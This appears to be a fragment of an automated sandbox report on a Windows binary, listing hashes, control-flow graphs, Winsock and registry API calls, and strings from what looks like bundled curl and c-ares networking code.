                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                  • String ID: 0
                                                  • API String ID: 2406880114-4108050209
                                                  • Opcode ID: 574b503cfc0174cc734a903f6046464379bf6591e08fa858c19505db7b9f15b8
                                                  • Instruction ID: f8f53f56d37c77128f1887e179fe294b0aa1d9fadb11a29a6aafe3eed681a374
                                                  • Opcode Fuzzy Hash: 574b503cfc0174cc734a903f6046464379bf6591e08fa858c19505db7b9f15b8
                                                  • Instruction Fuzzy Hash: 99E1E4B49043059FCB10EF68D988B9EBBF5AF84304F5088ADE888DB354E7749985CF52
                                                  Function 006105B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1511 6105b0-6105b7 1512 6105bd-6105d4 1511->1512 1513 6107ee 1511->1513 1514 6107e7-6107ed 1512->1514 1515 6105da-6105e6 1512->1515 1514->1513 1515->1514 1516 6105ec-6105f0 1515->1516 1517 6107c7-6107cc 1516->1517 1518 6105f6-610620 call 617350 call 6070b0 1516->1518 1517->1514 1523 610622-610624 1518->1523 1524 61066a-61068c call 63dec0 1518->1524 1526 610630-610655 call 6070d0 call 6103c0 call 617450 1523->1526 1530 610692-6106a0 1524->1530 1531 6107d6-6107e3 call 617380 1524->1531 1551 61065b-610668 call 6070e0 1526->1551 1552 6107ce 1526->1552 1534 6106a2-6106a4 1530->1534 1535 6106f4-6106f6 1530->1535 1531->1514 1540 6106b0-6106e4 call 6173b0 1534->1540 1537 6106fc-6106fe 1535->1537 1538 6107ef-61082b call 613000 1535->1538 1542 61072c-610754 1537->1542 1555 610831-610837 1538->1555 1556 610a2f-610a35 1538->1556 1540->1531 1550 6106ea-6106ee 1540->1550 1547 610756-61075b 1542->1547 1548 61075f-61078b 1542->1548 1553 610707-610719 WSAEventSelect 1547->1553 1554 61075d 1547->1554 1568 610791-610796 1548->1568 1569 610700-610703 1548->1569 1550->1540 1557 6106f0 1550->1557 1551->1524 1551->1526 1552->1531 1553->1531 1561 61071f 1553->1561 1562 610723-610726 1554->1562 1564 610861-61087e 1555->1564 1565 610839-610842 call 616fa0 1555->1565 1558 610a37-610a3a 1556->1558 1559 610a3c-610a52 1556->1559 1557->1535 1558->1559 1559->1531 1566 610a58-610a81 call 612f10 1559->1566 1561->1562 1562->1538 1562->1542 1578 610882-61088d 1564->1578 1572 610847-61084c 1565->1572 1566->1531 1584 610a87-610a97 call 616df0 1566->1584 1568->1569 1571 61079c-6107c2 call 6076a0 1568->1571 1569->1553 1571->1569 1576 610852 1572->1576 1577 610a9c-610aa4 1572->1577 1576->1564 1581 610854-61085f 1576->1581 1577->1531 1582 610970-610975 1578->1582 1583 610893-6108b1 1578->1583 1581->1578 1585 610a19-610a2c 1582->1585 1586 61097b-610989 call 6070b0 1582->1586 1587 6108c8-6108f7 1583->1587 1584->1531 1585->1556 1586->1585 1594 61098f-61099e 1586->1594 1595 6108f9-6108fb 1587->1595 1596 6108fd-610925 1587->1596 1597 6109b0-6109c1 call 6070d0 1594->1597 1598 610928-61093f 1595->1598 1596->1598 1604 6109a0-6109ae call 6070e0 1597->1604 1605 6109c3-6109c7 1597->1605 1602 6108b3-6108c2 1598->1602 1603 610945-61096b 1598->1603 1602->1582 1602->1587 1603->1602 1604->1585 1604->1597 1607 6109e8-610a03 WSAEnumNetworkEvents 1605->1607 1608 6109d0-6109e6 WSAEventSelect 1607->1608 1609 610a05-610a17 1607->1609 1608->1604 1608->1607 1609->1608
                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00610711
                                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 006109DD
                                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006109FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: EventSelect$EnumEventsNetwork
                                                  • String ID: N=`$multi.c
                                                  • API String ID: 2170980988-3259019828
                                                  • Opcode ID: eb0981f58f63a319936c0b22e04c1e5b803c2c14a044c384fb90a36277516ce8
                                                  • Instruction ID: cfc5bedb7fc9f6317a4ccf905e09e784270b8486ffbbf658a0a4f99bf53389c2
                                                  • Opcode Fuzzy Hash: eb0981f58f63a319936c0b22e04c1e5b803c2c14a044c384fb90a36277516ce8
                                                  • Instruction Fuzzy Hash: B6D19E756083059BFB11CF24C881BEBB7E6BF94344F08482DF88586292E7B5E9D5CB52
                                                  Function 006CB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1682 6cb180-6cb195 1683 6cb19b-6cb1a2 1682->1683 1684 6cb3e0-6cb3e7 1682->1684 1685 6cb1b0-6cb1b9 1683->1685 1685->1685 1686 6cb1bb-6cb1bd 1685->1686 1686->1684 1687 6cb1c3-6cb1d0 1686->1687 1689 6cb3db 1687->1689 1690 6cb1d6-6cb1f2 1687->1690 1689->1684 1691 6cb229-6cb22d 1690->1691 1692 6cb3e8-6cb417 1691->1692 1693 6cb233-6cb246 1691->1693 1701 6cb41d-6cb429 1692->1701 1702 6cb582-6cb589 1692->1702 1694 6cb248-6cb24b 1693->1694 1695 6cb260-6cb264 1693->1695 1696 6cb24d-6cb256 1694->1696 1697 6cb215-6cb223 1694->1697 1699 6cb269-6cb286 call 6caf30 1695->1699 1696->1699 1697->1691 1700 6cb315-6cb33c call 988b00 1697->1700 1708 6cb288-6cb2a3 call 6cb060 1699->1708 1709 6cb2f0-6cb301 1699->1709 1716 6cb3bf-6cb3ca 1700->1716 1717 6cb342-6cb347 1700->1717 1705 6cb42b-6cb433 call 6cb590 1701->1705 1706 6cb435-6cb44c call 6cb590 1701->1706 1705->1706 1719 6cb44e-6cb456 call 6cb590 1706->1719 1720 6cb458-6cb471 call 6cb590 1706->1720 1727 6cb2a9-6cb2c7 getsockname call 6cb020 1708->1727 1728 6cb200-6cb213 call 6cb020 1708->1728 1709->1697 1731 6cb307-6cb310 1709->1731 1721 6cb3cc-6cb3d9 1716->1721 1723 6cb349-6cb358 1717->1723 1724 6cb384-6cb38f 1717->1724 1719->1720 1740 6cb48c-6cb4a7 1720->1740 1741 6cb473-6cb487 1720->1741 1721->1684 1725 6cb360-6cb382 1723->1725 1724->1716 1726 6cb391-6cb3a5 1724->1726 1725->1724 1725->1725 1732 6cb3b0-6cb3bd 1726->1732 1738 6cb2cc-6cb2dd 1727->1738 1728->1697 1731->1721 1732->1716 1732->1732 1738->1697 1742 6cb2e3 1738->1742 1743 6cb4a9-6cb4b1 call 6cb660 1740->1743 1744 6cb4b3-6cb4cb call 6cb660 1740->1744 1741->1702 1742->1731 1743->1744 1749 6cb4cd-6cb4d5 call 6cb660 1744->1749 1750 6cb4d9-6cb4f5 call 6cb660 1744->1750 1749->1750 1755 6cb50d-6cb52b call 6cb770 * 2 1750->1755 1756 6cb4f7-6cb50b 1750->1756 1755->1702 1761 6cb52d-6cb531 1755->1761 1756->1702 1762 6cb580 1761->1762 1763 6cb533-6cb53b 1761->1763 1762->1702 1764 6cb53d-6cb547 1763->1764 1765 6cb578-6cb57e 1763->1765 1764->1765 1766 6cb549-6cb54d 1764->1766 1765->1702 1766->1765 1767 6cb54f-6cb558 1766->1767 1767->1765 1768 6cb55a-6cb576 call 6cb870 * 2 1767->1768 1768->1702 1768->1765
                                                  APIs
                                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 006CB2B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                                  • API String ID: 3358416759-2430778319
                                                  • Opcode ID: ddea6a7621d556c157f0924ac6f7c228c4014f277ac70ef35792f8bd093aaae2
                                                  • Instruction ID: b4273676b32650fde1e5f356b6d9b9e8c584882aec4287f1ecc069ab271dfbfe
                                                  • Opcode Fuzzy Hash: ddea6a7621d556c157f0924ac6f7c228c4014f277ac70ef35792f8bd093aaae2
                                                  • Instruction Fuzzy Hash: F9C16D716042059FD718DF24C882F7AB7E6EF88304F44986DE8899B3A2DB35ED45CB81
                                                  Function 00616FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b85d092316a127a69d53abe598db28c864f6bee7a8392c6d195a2fb3c1e0f30
                                                  • Instruction ID: ebf34562a2e88d19c0f93896e108b386ffbc201266323fe10f7a5db733aeee2e
                                                  • Opcode Fuzzy Hash: 0b85d092316a127a69d53abe598db28c864f6bee7a8392c6d195a2fb3c1e0f30
                                                  • Instruction Fuzzy Hash: 0791F33060C3495BD7358A69C8907FBB2F6EFC4324F2C8B2CE8A9432D4E7759D819691
                                                  Function 006CA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,006B712E,?,?,?,00001001,00000000), ref: 006CA90D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: recvfrom
                                                  • String ID:
                                                  • API String ID: 846543921-0
                                                  • Opcode ID: 232ad5b5d2d26db02566ef424167b5c1e9f3067ba9034c2985cc17cfd76d13ac
                                                  • Instruction ID: 350c3c10ddd82a16f3a3f69c62d76726fb8a876d4b9c651a4baee00cdca640fa
                                                  • Opcode Fuzzy Hash: 232ad5b5d2d26db02566ef424167b5c1e9f3067ba9034c2985cc17cfd76d13ac
                                                  • Instruction Fuzzy Hash: B5F04975118348AFD2109A41DC84EBBBBEDEBC9768F05455DF948132118270AE118AB2
                                                  Function 006BA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 006BAA19
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 006BAA4C
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 006BAA97
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 006BAAE9
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 006BAB30
                                                  • RegCloseKey.KERNELBASE(?), ref: 006BAB6A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 006BAB82
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 006BAC46
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 006BAD0A
                                                  • RegEnumKeyExA.KERNELBASE ref: 006BAD8D
                                                  • RegCloseKey.KERNELBASE(?), ref: 006BADD9
                                                  • RegEnumKeyExA.KERNELBASE ref: 006BAE08
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 006BAE2A
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 006BAE54
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 006BAF63
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 006BAFB2
                                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 006BB072
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$Open$CloseEnum
                                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                  • API String ID: 4217438148-1047472027
                                                  • Opcode ID: aa09129c070776f6026543a7b39dc3f104749600116fc45ddb31b943f1b08955
                                                  • Instruction ID: 54388cc9344425fa13f5d64200b7b6c31fc8c5e84f09aee509fbcfec7820d31b
                                                  • Opcode Fuzzy Hash: aa09129c070776f6026543a7b39dc3f104749600116fc45ddb31b943f1b08955
                                                  • Instruction Fuzzy Hash: F9726CB1604301AFE7209B64CC81FAB77E9EF85700F145828F9859B3A1E775E985CB63
                                                  Function 0063A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0063A831
                                                  Strings
                                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0063A796
                                                  • Local port: %hu, xrefs: 0063AF28
                                                  • bind failed with errno %d: %s, xrefs: 0063B080
                                                  • @, xrefs: 0063A8F4
                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0063A6CE
                                                  • @, xrefs: 0063AC42
                                                  • Trying [%s]:%d..., xrefs: 0063A689
                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0063ADAC
                                                  • cf-socket.c, xrefs: 0063A5CD, 0063A735
                                                  • Could not set TCP_NODELAY: %s, xrefs: 0063A871
                                                  • Bind to local port %d failed, trying next, xrefs: 0063AFE5
                                                  • Trying %s:%d..., xrefs: 0063A7C2, 0063A7DE
                                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0063AE1F
                                                  • Local Interface %s is ip %s using address family %i, xrefs: 0063AE60
                                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0063AD0A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3981526788-2373386790
                                                  • Opcode ID: de6bd4238117d926afb9c55b75fb61170c8052ef5ac1e7b0670c999a02d2ebbd
                                                  • Instruction ID: d50a611e6d9a111dffad80280ae26c3dbbca3b2fdf5d04e62e8953862c5ed012
                                                  • Opcode Fuzzy Hash: de6bd4238117d926afb9c55b75fb61170c8052ef5ac1e7b0670c999a02d2ebbd
                                                  • Instruction Fuzzy Hash: 1562F071508340ABE7218F64C882BEBB7E6AF95304F04492DF98897392E771E845DBD3
                                                  Function 006C9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 943 6c9740-6c975b 944 6c975d-6c9768 call 6c78a0 943->944 945 6c9780-6c9782 943->945 954 6c976e-6c9770 944->954 955 6c99bb-6c99c0 944->955 946 6c9788-6c97a0 call 988e00 call 6c78a0 945->946 947 6c9914-6c994e call 988b70 RegOpenKeyExA 945->947 946->955 960 6c97a6-6c97c5 946->960 958 6c995a-6c9992 RegQueryValueExA RegCloseKey call 988b98 947->958 959 6c9950-6c9955 947->959 954->960 961 6c9772-6c977e 954->961 956 6c9a0c-6c9a15 955->956 973 6c9997-6c99b5 call 6c78a0 958->973 959->956 966 6c9827-6c9833 960->966 967 6c97c7-6c97e0 960->967 961->946 969 6c985f-6c9872 call 6c5ca0 966->969 970 6c9835-6c985c call 6be2b0 * 2 966->970 971 6c97f6-6c9809 967->971 972 6c97e2-6c97f3 call 988b50 967->972 982 6c9878-6c987d call 6c77b0 969->982 983 6c99f0 969->983 970->969 971->966 985 6c980b-6c9810 971->985 972->971 973->955 973->960 990 6c9882-6c9889 982->990 989 6c99f5-6c99fb call 6c5d00 983->989 985->966 986 6c9812-6c9822 985->986 986->956 998 6c99fe-6c9a09 989->998 990->989 994 6c988f-6c989b call 6b4fe0 990->994 994->983 1002 6c98a1-6c98c3 call 988b50 call 6c78a0 994->1002 998->956 1007 6c98c9-6c98db call 6be2d0 1002->1007 1008 6c99c2-6c99ed call 6be2b0 * 2 1002->1008 